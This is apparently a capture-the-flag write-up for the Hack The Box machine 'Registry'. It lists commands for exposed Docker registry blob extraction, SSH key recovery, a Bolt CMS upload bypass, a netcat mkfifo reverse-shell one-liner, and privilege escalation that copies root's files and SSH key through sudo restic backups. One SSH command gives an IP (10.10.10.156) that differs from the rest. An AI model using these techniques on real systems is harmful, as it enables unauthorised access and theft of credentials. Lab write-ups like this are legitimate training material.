[HTB] Registry — Write-up

Recon

Nmap

$ nmap -Pn — open -sC -sV -p- -T4 10.10.10.159

Initial Foothold (Docker Registry)

HTTPS (443/TCP)

Dirsearch

$ dirsearch.py -u https://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt,html

Docker Registry API Exploitation

### Downloading Each Blob
https://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
### Unzipping Each Blob
$ tar -xvf sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b

User Access #1 (bolt)

### Password for Encrypted Private Key
/etc/profile.d/01-ssh.sh
### Username 
/root/.ssh/config
### Encrypted Private Key
/root/.ssh/id_rsa
### SSH as "bolt"
$ ssh -i id_rsa bolt@10.10.10.156

user.txt

User Access #2 (bolt → www-data)

Bolt App — Admin Password Recovery

Bolt App — Admin Login

Bolt App —File Upload File-type Bypass

Accessing Config.yml File

Bolt App — Reverse Shell

### Netcat Reverse Shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 9002 >/tmp/f

Root Access

Restic (Backup Solution)

### Creating Repository
bolt@bolt:/tmp$ restic init --repo /tmp/restic
*Enter any password you want. I used "bigb0ss."
### Moving rest-server binary
$ sftp -i id_rsa bolt@10.10.10.159
bolt@bolt:/tmp$ put rest-server-0.9.7-linux-amd64
### Running rest-server
bolt@bolt:/tmp$ chmod +x rest-server-0.9.7-linux-amd64
bolt@bolt:/tmp$ ./rest-server-0.9.7-linux-amd64
### Backup root.txt with sudo
www-data@bolt:/tmp$ sudo restic backup -r rest:http://127.0.0.1:8000 /root/root.txt
### Creating Snapshots (*No sudo required)
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 snapshots
### Restoring the Snapshots (*No sudo required)
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 restore 680634a8 --target /tmp/ting
### Getting Root SSH Keys
www-data@bolt:/tmp$ sudo restic backup -r rest:http://127.0.0.1:8000 /root/.ssh/id_rsa
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 snapshots
www-data@bolt:/tmp$ restic -r rest:http://127.0.0.1:8000 restore ec881c80 --target /tmp/ssh

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store